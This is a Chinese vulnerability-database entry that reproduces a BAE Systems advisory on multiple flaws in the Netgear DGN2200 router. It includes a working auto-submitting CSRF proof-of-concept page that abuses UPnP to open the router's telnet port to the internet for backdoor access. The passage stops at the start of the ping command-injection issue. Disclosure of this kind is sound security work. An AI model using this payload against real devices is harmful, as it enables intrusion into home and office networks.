发布日期:2014-02-12
更新日期:2014-02-15
受影响系统:
Netgear N300 DGN2200 1.0.0.36-7.0.37
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 65530
NetGear N300 DGN2200是无线路由器产品。
NetGear N300 DGN2200(固件版本1.0.0.36-7.0.37)在实现上存在本地信息泄露、跨站请求伪造、任意文件访问、远程命令执行、未授权访问、安全限制绕过漏洞,攻击者可利用这些漏洞绕过某些安全限制、获取敏感信息、执行未授权操作、未授权访问权限并在受影响应用上下文中执行任意命令。
<*来源:Andrew Horton
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
NetGear DGN2200 N300 Wireless Router - Multiple Vulnerabilities
EDB-ID: 31617 CVE: N/A OSVDB-ID: N/A
Author: Andrew Horton Published: 2014-02-12 Verified: Not Verified
Exploit Code: Download Vulnerable App: N/A
Rating
Overall:
Title: Multiple vulnerabilities in NETGEAR N300 WIRELESS ADSL2+ MODEM ROUTER DGN2200
====================================================================================
Notification Date: 11 February 2014
Affected Vendor: NetGear
Affected Hardware: NetGear DGN2200 N300 Wireless ADSL2+ Modem Router
Firmware Version: V1.0.0.36-7.0.37
Issue Types: * Command Injection
* Cross-site Request Forgery
* UPNP Exploitation through Cross-site Request Forgery
* Insecure FTP Root
* Cannot Disable WPS
* Passwords Stored in Plaintext
* Information Disclosure
* Firmware Update MITM
Advisory Code: AIS-2014-003
Discovered by: Andrew Horton
Issue status: No patch available - product beyond End of Life
Summary
=======
BAE Systems Applied Intelligence researcher, Andrew Horton has identified that the NetGear N300 Wireless ADSL 2+ Modem Router model DGN2200 suffers from multiple vulnerabilities which may be exploited by both local and remote attackers. This enables an attacker to completely compromise the device and stage further attacks against the local network and internet.
NetGear have indicated that this product is beyond its end of life and therefore these vulnerabilities will not be patched. As a result, BAE Systems have delayed release of this advisory for over 12 months to reduce the likelihood of active exploitation.
1. UPNP Vulnerable to CSRF
===========================
Requires
--------
Luring an unauthenticated or authenticated user to an attacker-controlled webpage.
Description
-----------
The Universal Plug and Play (UPNP) implementation used by NetGear accepts an HTTP POST request as a valid XML request, rendering the UPNP service vulnerable to inter-protocol Cross-Site Request Forgery attacks. This can be used to bypass or alter firewall rules.
The UPNP interface of the router listens on TCP port 5000 and can only be accessed from the LAN side of the device. UPNP requests do not require authentication with passwords. This vulnerability exists because the request is initiated by a user's browser on the LAN side of the device.
Impact
------
Using this vulnerability, BAE Systems was able to add new firewall rules to enable internet access to the insecure telnet port and the admin web interface.
Proof of concept
----------------
The following webpage will make telnet for the router accessible to the internet so that it may be attacked using the GearDog backdoor (See issue 5). The GearDog backdoor is a known remote access backdoor implemented in many NetGear products. This requires brute-forcing the MAC address.
<html>
<form action="http://192.168.0.1:5000/Public_UPNP_C3" method="post" ENCTYPE="text/plain">
<textarea><?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
.<m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1">
<NewPortMappingDescription>hax3</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration><NewInternalClient>192.168.0.1</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>887</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>23</NewInternalPort>
.</m:AddPortMapping>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope></textarea>
<input type="submit" >
</form>
<script> document.forms[0].submit();</script>
</html>
Note: 192.168.0.1 is the default LAN IP address. Port 23 is the internal port number and port 887 is the external port number to be opened.
Solution
--------
Ensure that UPNP requests sent through HTTP POST parameters are not honoured.
2. Command Execution with Ping
===============================
Requires
--------
Authenticated access to the web administration interface.